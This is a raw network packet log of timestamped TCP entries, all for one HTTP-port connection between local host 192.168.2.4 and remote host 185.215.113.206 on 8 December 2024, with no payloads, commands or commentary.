Dec 8, 2024 19:52:26.963926077 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.964705944 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.964751959 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.964771032 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.964883089 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.965511084 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.965673923 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.965733051 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.966356993 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.966481924 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.966543913 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.967159033 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.967210054 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.967272997 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.968010902 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.968121052 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.968132019 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.968200922 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.968775034 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.968854904 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.968930960 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.969043016 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.969840050 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.969893932 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.970062971 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.970105886 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.970474958 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.970519066 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.970784903 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.970885038 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.971282005 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.971625090 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.971685886 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.972093105 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.972172976 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.972233057 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.972853899 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.973000050 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.973053932 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.973680973 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.973727942 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.973757029 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.974199057 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.974529982 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.974582911 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.974720001 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.974762917 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.975277901 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.975337982 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.975366116 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.975447893 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.976078033 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.976125002 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.976186037 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.976234913 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.976891994 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.976938963 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.977056980 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.977148056 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.977725029 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.977854013 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.977901936 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.978529930 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.978759050 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.978820086 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.979424000 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.979481936 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.979494095 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.980206966 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.980253935 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.980417967 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.980499983 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.981163979 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.981215954 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.981347084 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.981385946 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.981823921 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.981966019 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.982013941 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.982630014 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.982688904 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.982775927 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.982814074 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.983438969 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.983484983 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.983633995 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.983689070 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.984244108 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.984307051 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.984354973 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.985034943 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.985094070 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.985151052 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.985213041 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.985944033 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.985996008 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.986062050 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.986105919 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.986689091 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.986740112 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.986875057 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.986920118 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.987479925 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.987498999 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.987526894 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.987540960 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.988280058 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.988329887 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.988413095 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.988457918 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.989063978 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.989109993 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.989180088 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.989223957 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.989888906 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.989936113 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.989986897 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.990031958 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.990756989 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.990802050 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.990830898 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.990868092 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.991565943 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.991616011 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.991668940 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.991710901 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.992322922 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.992407084 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.992430925 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.992475033 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.141202927 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.141411066 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.141442060 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.141452074 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.141486883 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.141510963 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.141628027 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.141680002 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.142271042 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.142318010 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.142364025 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.142410994 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.143075943 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.143111944 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.143140078 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.143157005 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.143634081 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.143683910 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.144478083 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.144529104 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.144546986 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.144558907 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.144591093 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.145307064 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.145354033 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.145476103 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.145522118 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.146069050 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.146115065 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.146148920 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.146190882 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.146852970 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.146900892 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.146975040 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.147023916 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.147783041 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.147826910 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.147913933 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.147959948 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.148485899 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.148531914 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.148663044 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.148710012 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.149323940 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.149373055 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.149441957 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.149490118 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.150147915 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.150196075 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.150289059 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.150333881 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.150928020 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.150974989 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.151088953 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.151134014 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.151835918 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.151885986 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.151958942 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.152004957 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.152631044 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.152678013 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.152908087 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.152956009 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.153381109 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.153428078 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.153528929 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.153573990 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.154201031 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.154247999 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.154372931 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.154418945 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.155024052 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.155071020 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.155252934 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.155297995 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.155843019 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.155889034 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.156052113 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.156100035 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.156618118 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.156665087 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.156752110 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.156795979 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.157483101 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.157529116 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.157562017 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.157604933 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.158276081 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.158322096 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.158359051 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.158401966 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.159109116 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.159154892 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.193073034 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.351917982 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.669580936 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.669660091 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.669683933 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.669722080 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.669864893 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.670044899 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.670085907 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.670149088 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.670839071 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.670892954 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.670926094 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.671250105 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.671636105 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.671684027 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.671772003 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.671817064 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.672466040 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.672517061 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.672518015 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.672558069 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.673310041 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.673357964 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.673466921 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.673516035 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.674129963 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.674180031 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.674330950 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.674375057 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.674921989 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.674964905 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.675033092 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.675081968 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.675697088 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.675749063 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.675831079 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.675882101 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.676495075 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.676544905 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.676628113 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.676670074 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.677433968 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.677481890 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.677658081 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.677702904 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.678358078 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.678404093 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.678433895 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.678477049 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.679081917 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.679131031 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.679171085 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.679214001 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.679780006 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.679821968 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.679914951 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.679958105 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.680547953 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.680599928 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.680752993 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.680800915 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.681356907 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.681401968 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.681484938 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.681528091 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.682163954 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.682214022 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.682267904 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.682316065 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.683016062 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.683070898 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.683073997 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.683111906 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.683793068 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.683837891 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.683870077 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.683917046 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.684607029 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.684653997 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.684782028 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.684827089 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.685595989 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.685636997 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.685662985 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.685815096 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.686222076 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.686275959 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.686347008 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.686424017 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.687072992 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.687123060 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.687191010 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.687235117 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.687886953 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.687937021 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.688025951 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.688071966 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.688683033 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.688725948 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.688755989 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.688798904 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.689487934 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.689531088 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.689563036 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.689606905 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.690490961 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.690551043 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.690640926 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.690680981 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.691107035 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.691183090 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.691212893 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.691255093 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.691941977 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:27.691984892 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:27.692034960 CET	80	49748	185.215.113.206	192.168.2.4
